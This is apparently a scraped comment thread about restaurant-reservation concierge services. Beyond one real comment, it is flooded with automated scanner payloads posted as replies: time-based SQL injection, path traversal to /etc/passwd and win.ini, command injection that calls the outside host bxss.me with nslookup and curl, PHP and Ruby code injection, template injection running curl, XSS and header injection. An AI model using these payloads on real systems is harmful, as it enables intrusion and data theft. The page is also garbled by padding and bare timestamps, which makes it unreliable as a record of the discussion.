\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141148

re: kk1337

WEB-INF/web.xml

1727141148

re: kk1337

WEB-INF\web.xml

1727141149

re: kk1337

1

1727141584

re: kk1337

1

1727141596

re: kk1337

-1 OR 2+616-616-1=0+0+0+1 --

1727141597

re: kk1337

-1 OR 3+616-616-1=0+0+0+1 --

1727141597

re: kk1337

-1 OR 2+314-314-1=0+0+0+1

1727141598

re: kk1337

-1 OR 3+314-314-1=0+0+0+1

1727141598

re: kk1337

-1' OR 2+690-690-1=0+0+0+1 --

1727141599

re: kk1337

-1' OR 3+690-690-1=0+0+0+1 --

1727141599

re: kk1337

-1' OR 2+734-734-1=0+0+0+1 or 'zMG3VXdL'='

1727141600

re: kk1337

-1' OR 3+734-734-1=0+0+0+1 or 'zMG3VXdL'='

1727141600

re: kk1337

-1" OR 2+497-497-1=0+0+0+1 --

1727141601

re: kk1337

-1" OR 3+497-497-1=0+0+0+1 --

1727141601

re: kk1337

if(now()=sysdate(),sleep(15),0)

1727141612

re: kk1337

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141649

re: kk1337

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141682

re: kk1337

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141692

re: kk1337

-1; waitfor delay '0:0:15' --

1727141706

re: kk1337

-1); waitfor delay '0:0:15' --

1727141718

re: kk1337

1 waitfor delay '0:0:15' --

1727141730

re: kk1337

h6amh7JU'; waitfor delay '0:0:15' --

1727141742

re: kk1337

-5 OR 533=(SELECT 533 FROM PG_SLEEP(15))--

1727141753

re: kk1337

-5) OR 593=(SELECT 593 FROM PG_SLEEP(15))--

1727141763

re: kk1337

-1)) OR 499=(SELECT 499 FROM PG_SLEEP(15))--

1727141773

re: kk1337

8hBytlFE' OR 686=(SELECT 686 FROM PG_SLEEP(15))--

1727141782

re: kk1337

3G9xJLK8') OR 212=(SELECT 212 FROM PG_SLEEP(15))--

1727141790

re: kk1337

2hfC0I4m')) OR 408=(SELECT 408 FROM PG_SLEEP(15))--

1727141798

re: kk1337

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141806

re: kk1337

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141816

re: kk1337

'||(select 1 from (select pg_sleep(15))x)||'

1727141832

re: kk1337

''||(select 1 from (select pg_sleep(15))x)||''

1727141841

re: kk1337

1'"

1727141841

re: kk1337

@@w5Szg

1727141842

re: kk1337

1

1727383072

re: kk1337

1

1727383072

re: kk1337

1

1727383072

re: kk1337

1

1727383601

re: kk1337

1

1727383601

re: kk1337

1

1727383601

re: kk1337

1RNFVG7II0

1753894668

re: kk1337

response.write(9149618*9585281)

1753894672

re: kk1337

'+response.write(9149618*9585281)+'

1753894673

re: kk1337

"+response.write(9149618*9585281)+"

1753894674

re: kk1337


<esi:include src="http://bxss.me/rpb.png"/>

1753894679

re: kk1337

${10000358+9999542}

1753894680

re: kk1337

../../../../../../../../../../../../../../etc/passwd

1753894680

re: kk1337

../../../../../../../../../../../../../../windows/win.ini

1753894681

re: kk1337

file:///etc/passwd

1753894682

re: kk1337

../

1753894684

re: kk1337

)

1753894687

re: kk1337

redirtest.acx

1753894688

re: kk1337

!(()&&!|*|*|

1753894688

re: kk1337

^(#$!@#$)(()))******

1753894689

re: kk1337

ctime
sleep
p0
(I30
tp1
Rp2
.

1753894691

re: kk1337

'.gethostbyname(lc('hitjq'.'ecobbkuua0e41.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(71).chr(101).chr(74).'

1753894696

re: kk1337

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

1753894696

re: kk1337

".gethostbyname(lc("hitqo"."mzoslysi75c31.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(69).chr(99).chr(80)."

1753894697

re: kk1337

/etc/shells

1753894697

re: kk1337

gethostbyname(lc('hitud'.'psjlldew79924.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(82).chr(121).chr(68)

1753894697

re: kk1337

echo jfosfj$()\ nfkpfj\nz^xyu||a #' &echo jfosfj$()\ nfkpfj\nz^xyu||a #|" &echo jfosfj$()\ nfkpfj\nz^xyu||a #

1753894697

re: kk1337

../../../../../../../../../../../../../../etc/shells

1753894698

re: kk1337

&echo cprqty$()\ iagzsr\nz^xyu||a #' &echo cprqty$()\ iagzsr\nz^xyu||a #|" &echo cprqty$()\ iagzsr\nz^xyu||a #

1753894698

re: kk1337

c:/windows/win.ini

1753894699

re: kk1337

|echo mucqxg$()\ rtfntx\nz^xyu||a #' |echo mucqxg$()\ rtfntx\nz^xyu||a #|" |echo mucqxg$()\ rtfntx\nz^xyu||a #

1753894699

1753894700

re: kk1337

bxss.me

1753894700

re: kk1337

expr 9000270128 - 929964

1753894700

re: kk1337

bxss.me/t/xss.html?%00

1753894701

1753894701

re: kk1337

(nslookup -q=cname hitjohspxqckieb947.bxss.me||curl hitjohspxqckieb947.bxss.me))

1753894701

1753894702

re: kk1337

$(nslookup -q=cname hittsepwasusi97f23.bxss.me||curl hittsepwasusi97f23.bxss.me)

1753894703

re: kk1337

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1753894703

re: kk1337

"+"A".concat(70-3).concat(22*4).concat(114).concat(68).concat(116).concat(75)+(require"socket"
Socket.gethostbyname("hitgk"+"bfahbnnsd3dfc.bxss.me.")[3].to_s)+"

1753894703

re: kk1337

&nslookup -q=cname hitfjkznhdpfr2da61.bxss.me&'\"`0&nslookup -q=cname hitfjkznhdpfr2da61.bxss.me&`'

1753894704

re: kk1337

';print(md5(31337));$a='

1753894704

re: kk1337

'+'A'.concat(70-3).concat(22*4).concat(102).concat(75).concat(101).concat(86)+(require'socket'
Socket.gethostbyname('hitax'+'zbkjgsuobe3b3.bxss.me.')[3].to_s)+'

1753894704

re: kk1337

&(nslookup -q=cname hitlojcvwxwho26b26.bxss.me||curl hitlojcvwxwho26b26.bxss.me)&'\"`0&(nslookup -q=cname hitlojcvwxwho26b26.bxss.me||curl hitlojcvwxwho26b26.bxss.me)&`'

1753894705

re: kk1337

";print(md5(31337));$a="

1753894706

re: kk1337

'A'.concat(70-3).concat(22*4).concat(102).concat(80).concat(102).concat(78)+(require'socket'
Socket.gethostbyname('hitnr'+'fcokjwyb32924.bxss.me.')[3].to_s)

1753894706

re: kk1337

|(nslookup -q=cname hitswdfcfxpvi44eb4.bxss.me||curl hitswdfcfxpvi44eb4.bxss.me)

1753894707

re: kk1337

${@print(md5(31337))}

1753894708

re: kk1337

'"()

1753894708

re: kk1337

`(nslookup -q=cname hitjqjagklcuc8b9d7.bxss.me||curl hitjqjagklcuc8b9d7.bxss.me)`

1753894708

re: kk1337

${@print(md5(31337))}\

1753894709

re: kk1337


'&&sleep(27*1000)*xdxhsr&&'

1753894709

re: kk1337

replies

1753894710

re: kk1337

;(nslookup -q=cname hituylgntbsfcfb919.bxss.me||curl hituylgntbsfcfb919.bxss.me)|(nslookup -q=cname hituylgntbsfcfb919.bxss.me||curl hituylgntbsfcfb919.bxss.me)&(nslookup -q=cname hituylgntbsfcfb919.bxss.me||curl hituylgntbsfcfb919.bxss.me)

1753894710

re: kk1337

'.print(md5(31337)).'

1753894710

re: kk1337

'"

1753894710

re: kk1337


"&&sleep(27*1000)*cymiln&&"

1753894710

re: kk1337

replies

1753894711

re: kk1337

|(nslookup${IFS}-q${IFS}cname${IFS}hithgobbimnyx511ac.bxss.me||curl${IFS}hithgobbimnyx511ac.bxss.me)

1753894711

re: kk1337

<!--

1753894711

re: kk1337


'||sleep(27*1000)*eqssfo||'

1753894712

re: kk1337

replies/.

1753894712

re: kk1337

&(nslookup${IFS}-q${IFS}cname${IFS}hityipzruwngf7cc46.bxss.me||curl${IFS}hityipzruwngf7cc46.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hityipzruwngf7cc46.bxss.me||curl${IFS}hityipzruwngf7cc46.bxss.me)&`'

1753894712

re: kk1337


"||sleep(27*1000)*igacbw||"

1753894713

re: kk1337


'"()&%<zzz><ScRiPt >f0er(9256)</ScRiPt>

1753894720

re: kk1337

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitvpfuegkjewc3a0a.bxss.me")}}

1753894721

re: kk1337

'"()&%<zzz><ScRiPt >f0er(9634)</ScRiPt>

1753894722

re: kk1337


9863663

1753894723

re: kk1337


KTs85VMs

1753894912

re: kk1337


*1

1753894918

re: kk1337


*1

1753894918

re: kk1337


*1

1753894919

re: kk1337


*1

1753894919

re: kk1337

-1 OR 5*5=25 --

1753894920

re: kk1337

-1 OR 5*5=26 --

1753894921

re: kk1337

-1 OR 5*5=25

1753894921

re: kk1337

-1 OR 5*5=26

1753894922

re: kk1337


*if(now()=sysdate(),sleep(15),0)

1753894928

re: kk1337


0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z

1753894935

re: kk1337


0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z

1753894939

re: kk1337

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1753894945

re: kk1337


-1; waitfor delay '0:0:15' --

1753894952

re: kk1337


-1); waitfor delay '0:0:15' --

1753894958

re: kk1337


-1 waitfor delay '0:0:15' --

1753894964

re: kk1337


33oYOpWz'; waitfor delay '0:0:15' --

1753894970

re: kk1337


-1 OR 901=(SELECT 901 FROM PG_SLEEP(15))--

1753894975

re: kk1337


-1) OR 629=(SELECT 629 FROM PG_SLEEP(15))--

1753894982

re: kk1337


-1)) OR 46=(SELECT 46 FROM PG_SLEEP(15))--

1753894987

re: kk1337


sgOvBytE' OR 274=(SELECT 274 FROM PG_SLEEP(15))--

1753894993

re: kk1337


t3gehDgT') OR 436=(SELECT 436 FROM PG_SLEEP(15))--

1753895000

re: kk1337


WJn7GQHu')) OR 841=(SELECT 841 FROM PG_SLEEP(15))--

1753895005

re: kk1337


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1753895013

re: kk1337


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1753895018

re: kk1337

'||(select 1 from (select pg_sleep(15))x)||'

1753895023

re: kk1337

''||(select 1 from (select pg_sleep(15))x)||''

1753895028

re: kk1337


'"

1753895030

re: kk1337

@@8SOtm

1753895032

re: kk1337

(select 198766*667891)

1753895033

re: kk1337

(select 198766*667891 from DUAL)

1753895034

I think it should be like all other online concierges. They might have partnership with certain restaurants, whereas others they only will call but there is likely no hope of getting a reservation.

I remember seeing certain restaurants charging full amount when you make a reservation whereas others are charging 1000JPY.

1681296540 Reply
Add photos

re: guest

kTI7UB41

1697002631

re: guest

1*

1697002631

re: guest

1*

1697002631

re: guest

1*

1697002631

re: guest

1*

1697002632

re: guest

-1 OR 2+135-135-1=0+0+0+1

1697002632

re: guest

-1 OR 3+135-135-1=0+0+0+1

1697002632

re: guest

if(now()=sysdate(),sleep(15),0)

1697002637

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002642

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002646

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002650

re: guest

-1; waitfor delay '0:0:15' --

1697002655

re: guest

-1); waitfor delay '0:0:15' --

1697002662

re: guest

1 waitfor delay '0:0:15' --

1697002666

re: guest

tbTKlxcm'; waitfor delay '0:0:15' --

1697002670

re: guest

-5 OR 913=(SELECT 913 FROM PG_SLEEP(15))--

1697002674

re: guest

-5) OR 279=(SELECT 279 FROM PG_SLEEP(15))--

1697002679

re: guest

-1)) OR 214=(SELECT 214 FROM PG_SLEEP(15))--

1697002682

re: guest

WBzpG8BY' OR 873=(SELECT 873 FROM PG_SLEEP(15))--

1697002686

re: guest

n9cYWFcK') OR 93=(SELECT 93 FROM PG_SLEEP(15))--

1697002690

re: guest

ZtbLlKmu')) OR 45=(SELECT 45 FROM PG_SLEEP(15))--

1697002694

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002698

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002702

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1697002706

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1697002710

re: guest

1'"

1697002710

re: guest

@@lIkv6

1697002711

re: guest

pAU0xMTy

1697002729

re: guest

1*

1697002729

re: guest

1*

1697002730

re: guest

1*

1697002730

re: guest

1*

1697002730

re: guest

-1 OR 2+166-166-1=0+0+0+1

1697002730

re: guest

-1 OR 3+166-166-1=0+0+0+1

1697002730

re: guest

if(now()=sysdate(),sleep(15),0)

1697002734

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002740

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002744

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002748

re: guest

-1; waitfor delay '0:0:15' --

1697002752

re: guest

-1); waitfor delay '0:0:15' --

1697002757

re: guest

1 waitfor delay '0:0:15' --

1697002760

re: guest

Hcs9A7uB'; waitfor delay '0:0:15' --

1697002765

re: guest

-5 OR 512=(SELECT 512 FROM PG_SLEEP(15))--

1697002768

re: guest

-5) OR 496=(SELECT 496 FROM PG_SLEEP(15))--

1697002772

re: guest

-1)) OR 454=(SELECT 454 FROM PG_SLEEP(15))--

1697002776

re: guest

7Z87XrOl' OR 565=(SELECT 565 FROM PG_SLEEP(15))--

1697002780

re: guest

Ax96Dhwj') OR 335=(SELECT 335 FROM PG_SLEEP(15))--

1697002784

re: guest

NZ2d8l4v')) OR 413=(SELECT 413 FROM PG_SLEEP(15))--

1697002788

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002792

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002796

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1697002800

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1697002804

re: guest

1'"

1697002804

re: guest

@@EK8GE

1697002805

re: guest

1sTZv0m2O

1727140219

re: guest

%0abcc:074625.67-12678.67.126f6.19990.2@bxss.me

1727140223

re: guest

to@example.com>%0d%0abcc:074625.67-12679.67.126f6.19990.2@bxss.me

1727140223

re: guest

response.write(9727041*9052049)

1727140224

re: guest

'+response.write(9727041*9052049)+'

1727140224

re: guest

"+response.write(9727041*9052049)+"

1727140225

re: guest

../../../../../../../../../../../../../../etc/passwd

1727140226

re: guest

<esi:include src="http://bxss.me/rpb.png"/>

1727140226

re: guest

../../../../../../../../../../../../../../windows/win.ini

1727140227

re: guest

file:///etc/passwd

1727140227

re: guest

../../../../../../../../../../../../../../../proc/version

1727140228

re: guest

${9999446+9999140}

1727140228

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140229

re: guest

../../../../../../../../../../etc/passwd%00.jpg

1727140230

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140231

re: guest

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140232

re: guest

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140232

re: guest

)

1727140233

re: guest

/etc/passwd

1727140233

re: guest

echo lncxpi$()\ sebbzu\nz^xyu||a #' &echo lncxpi$()\ sebbzu\nz^xyu||a #|" &echo lncxpi$()\ sebbzu\nz^xyu||a #

1727140233

re: guest

'.gethostbyname(lc('hitly'.'kkekqosgecb4a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(87).chr(108).chr(66).'

1727140234

re: guest

!(()&&!|*|*|

1727140234

re: guest

%2fetc%2fpasswd

1727140234

re: guest

&echo qkaemm$()\ apuxim\nz^xyu||a #' &echo qkaemm$()\ apuxim\nz^xyu||a #|" &echo qkaemm$()\ apuxim\nz^xyu||a #

1727140234

re: guest

/.././.././.././.././.././.././.././../etc/./passwd%00

1727140235

re: guest

".gethostbyname(lc("hituo"."wgrfpttu56a7d.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(67).chr(103).chr(75)."

1727140235

re: guest

^(#$!@#$)(()))******

1727140235

re: guest

|echo szsbsy$()\ flxvop\nz^xyu||a #' |echo szsbsy$()\ flxvop\nz^xyu||a #|" |echo szsbsy$()\ flxvop\nz^xyu||a #

1727140235

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727140236

re: guest

(nslookup hitylwjnspdpq674a1.bxss.me||perl -e "gethostbyname('hitylwjnspdpq674a1.bxss.me')")

1727140236

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727140237

re: guest

$(nslookup hitypkaaibhigd919b.bxss.me||perl -e "gethostbyname('hitypkaaibhigd919b.bxss.me')")

1727140237

re: guest

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727140238

re: guest

&nslookup hitztnaeeqcbr3024e.bxss.me&'\"`0&nslookup hitztnaeeqcbr3024e.bxss.me&`'

1727140238

re: guest

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727140239

re: guest

&(nslookup hittnelgwurvg6abb3.bxss.me||perl -e "gethostbyname('hittnelgwurvg6abb3.bxss.me')")&'\"`0&(nslookup hittnelgwurvg6abb3.bxss.me||perl -e "gethostbyname('hittnelgwurvg6abb3.bxss.me')")&`'

1727140239

re: guest

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727140240

re: guest

|(nslookup hitgqpjeapvlg8658d.bxss.me||perl -e "gethostbyname('hitgqpjeapvlg8658d.bxss.me')")

1727140240

1727140240

re: guest

"+"A".concat(70-3).concat(22*4).concat(104).concat(69).concat(120).concat(70)+(require"socket"
Socket.gethostbyname("hitwz"+"sqfnaxgt2e32f.bxss.me.")[3].to_s)+"

1727140240

re: guest

file:///etc/passwd

1727140241

re: guest

`(nslookup hithxtziycvczc915f.bxss.me||perl -e "gethostbyname('hithxtziycvczc915f.bxss.me')")`

1727140241

re: guest

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727140241

re: guest

bxss.me/t/xss.html?%00

1727140241

re: guest

'+'A'.concat(70-3).concat(22*4).concat(120).concat(69).concat(118).concat(85)+(require'socket'
Socket.gethostbyname('hitwe'+'wmvikkrw48c45.bxss.me.')[3].to_s)+'

1727140241

re: guest

/\../\../\../\../\../\../\../etc/passwd

1727140242

re: guest

;(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")|(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")&(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")

1727140242

re: guest

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727140242

1727140242

re: guest

/WEB-INF/web.xml

1727140242

1727140243

re: guest

C:\WINDOWS\system32\drivers\etc\hosts

1727140244

re: guest

/etc/shells

1727140244

re: guest

../../../../../../../../../../windows/win.ini%00.jpg

1727140245

re: guest

c:/windows/win.ini

1727140245

re: guest

/../../../../../../../../../../boot.ini

1727140246

re: guest

bxss.me

1727140246

re: guest

'"

1727140247

re: guest

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727140247

re: guest

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727140247

re: guest

<!--

1727140248

re: guest

..\..\..\..\..\..\..\..\windows\win.ini

1727140248

re: guest

';print(md5(31337));$a='

1727140248

re: guest

";print(md5(31337));$a="

1727140249

re: guest

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727140249

re: guest

${@print(md5(31337))}

1727140250

re: guest

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727140251

re: guest

${@print(md5(31337))}\

1727140251

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727140252

re: guest

'.print(md5(31337)).'

1727140252

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727140252

re: guest

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.